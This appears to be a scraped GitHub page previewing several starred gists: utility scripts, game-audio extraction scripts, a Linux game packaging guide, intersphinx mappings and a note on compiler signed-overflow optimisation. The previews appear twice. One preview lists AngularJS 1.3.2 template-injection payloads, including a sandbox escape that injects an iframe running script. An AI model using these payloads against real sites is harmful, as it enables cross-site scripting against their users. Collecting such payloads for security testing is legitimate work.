Stephan Sokolow ssokolow

## coverage.py
#!/usr/bin/env python2

# butchered from https://github.com/huonw/travis-cargo
# under MIT license

from __future__ import print_function
import argparse
import os
import sys
import subprocess

## print256colours.sh
#!/bin/bash

# Tom Hale, 2016. MIT Licence.
# Print out 256 colours, with each number printed in its corresponding colour
# See http://askubuntu.com/questions/821157/print-a-256-color-test-pattern-in-the-terminal/821163#821163

set -eu # Fail on errors or undeclared variables

printable_colours=256

## help-gnu.zsh
# Love you, GNU. But got a bit tired of this conversation pattern:
#
#   % ln -h
#   ln: invalid option -- 'h'
#   Try 'ln --help' for more information.
#
# Don't worry. I fixed you for me.
#
# Eternally yours,
#

## AngularTI.md

      
              1 file
            
          
              30 forks
            
          
              0 comments
            
          
              90 stars
            
          
                mccabe615
                / AngularTI.md
            
            
              Last active
              April 18, 2024 11:37
            
              
                Angular Template Injection Payloads
              
          
    1.3.2 and below

{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';


## gog_dex_extract_music.sh
#!/bin/bash

# Usage: gog_dex_extract_music.sh <data_dir>
#
# The script relies on these utilities:
# 1. QuickBMS extractor (quickbms)
#    See http://aluigi.altervista.org/quickbms.htm
#    Source: http://aluigi.altervista.org/papers/quickbms_src.zip
#
# 2. Unity BMS script to be used with QuickBMS (unity.bms)

## flibitPackaging.md

      
              1 file
            
          
              5 forks
            
          
              11 comments
            
          
              99 stars
            
          
                flibitijibibo
                / flibitPackaging.md
            
            
              Created
              June 17, 2016 16:00
            
              
                Hope you like reading ldd output!
              
          
    A week ago I was CC'd in on a thread about Linux packaging, and how to avoid doing it the wrong way (i.e. RPM, Deb, etc.). I've always used MojoSetup and I've never forced distributions to do any additional work, but this is still a new concept to a lot of people. Additionally, Amos suggested that I expand on Itch's FNA appendix, so here's a guide on how I package my games.
This is a bit of an expansion on my MAGFest 2016 presentation, which you can find here:
http://www.flibitijibibo.com/magfest2016/
https://www.youtube.com/watch?v=B83CWUh0Log
I would recommend looking at that first! After that, read on...

  
## intersphinx_mappings.txt
# The entries in this file are checked regularly for validity via the Github Action
# sited at github.com/bskinn/intersphinx-gist.
# Please feel free to post an issue at that repo if any of these mappings don't work for you,
# or if you're having trouble constructing a mapping for a project not listed here.

Python 3 [latest]: ('https://docs.python.org/3/', None)
Python 3 [3.x]: ('https://docs.python.org/3.9/', None)
attrs [stable]: ('https://www.attrs.org/en/stable/', None)
Django [dev]: ('https://docs.djangoproject.com/en/dev/', 'https://docs.djangoproject.com/en/dev/_objects/')
Flask [2.2.x]: ('https://flask.palletsprojects.com/en/2.2.x/', None)

## wine_dx11_status.sh
#!/bin/bash

# Shows status of selected wine dlls (like for DX11).
# Inspired by https://www.winehq.org/winapi_stats.
# The script works best in terminals with true color support,
# but it should work with less colors as well.

function no_clr()
{
   printf '\x1b[0m'

## gist:e0f055bfb74e3d5f0af20690759de5a7
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
mysterious cases where it helps?

A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.

TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.

## gog_kotor2_extract_music.sh
#!/bin/bash

# Analysis of obfsuscated KoTOR II audio
#
# *** Stock mp3 encoded with lame
# position of LAME : 0x09c (156)
# position of Info : 0x024 (36)
#
# *** KoTOR II obfuscated audio (using bed_001ebo.wav)
# position of LAME : 0xc7 (199)
	#!/usr/bin/env python2

	# butchered from https://github.com/huonw/travis-cargo
	# under MIT license

	from __future__ import print_function
	import argparse
	import os
	import sys
	import subprocess
	#!/bin/bash

	# Tom Hale, 2016. MIT Licence.
	# Print out 256 colours, with each number printed in its corresponding colour
	# See http://askubuntu.com/questions/821157/print-a-256-color-test-pattern-in-the-terminal/821163#821163

	set -eu # Fail on errors or undeclared variables

	printable_colours=256
	# Love you, GNU. But got a bit tired of this conversation pattern:
	#
	# % ln -h
	# ln: invalid option -- 'h'
	# Try 'ln --help' for more information.
	#
	# Don't worry. I fixed you for me.
	#
	# Eternally yours,
	#
	#!/bin/bash

	# Usage: gog_dex_extract_music.sh <data_dir>
	#
	# The script relies on these utilities:
	# 1. QuickBMS extractor (quickbms)
	# See http://aluigi.altervista.org/quickbms.htm
	# Source: http://aluigi.altervista.org/papers/quickbms_src.zip
	#
	# 2. Unity BMS script to be used with QuickBMS (unity.bms)
	# The entries in this file are checked regularly for validity via the Github Action
	# sited at github.com/bskinn/intersphinx-gist.
	# Please feel free to post an issue at that repo if any of these mappings don't work for you,
	# or if you're having trouble constructing a mapping for a project not listed here.

	Python 3 [latest]: ('https://docs.python.org/3/', None)
	Python 3 [3.x]: ('https://docs.python.org/3.9/', None)
	attrs [stable]: ('https://www.attrs.org/en/stable/', None)
	Django [dev]: ('https://docs.djangoproject.com/en/dev/', 'https://docs.djangoproject.com/en/dev/_objects/')
	Flask [2.2.x]: ('https://flask.palletsprojects.com/en/2.2.x/', None)
	#!/bin/bash

	# Shows status of selected wine dlls (like for DX11).
	# Inspired by https://www.winehq.org/winapi_stats.
	# The script works best in terminals with true color support,
	# but it should work with less colors as well.

	function no_clr()
	{
	printf '\x1b[0m'
	Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
	mysterious cases where it helps?

	A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
	I think it's useful to know what compiler writers are accomplishing by this.

	TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
	major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
	fairly common cases. The signed overflow UB exploitation is an attempt to work around this.
	#!/bin/bash

	# Analysis of obfsuscated KoTOR II audio
	#
	# *** Stock mp3 encoded with lame
	# position of LAME : 0x09c (156)
	# position of Info : 0x024 (36)
	#
	# *** KoTOR II obfuscated audio (using bed_001ebo.wav)
	# position of LAME : 0xc7 (199)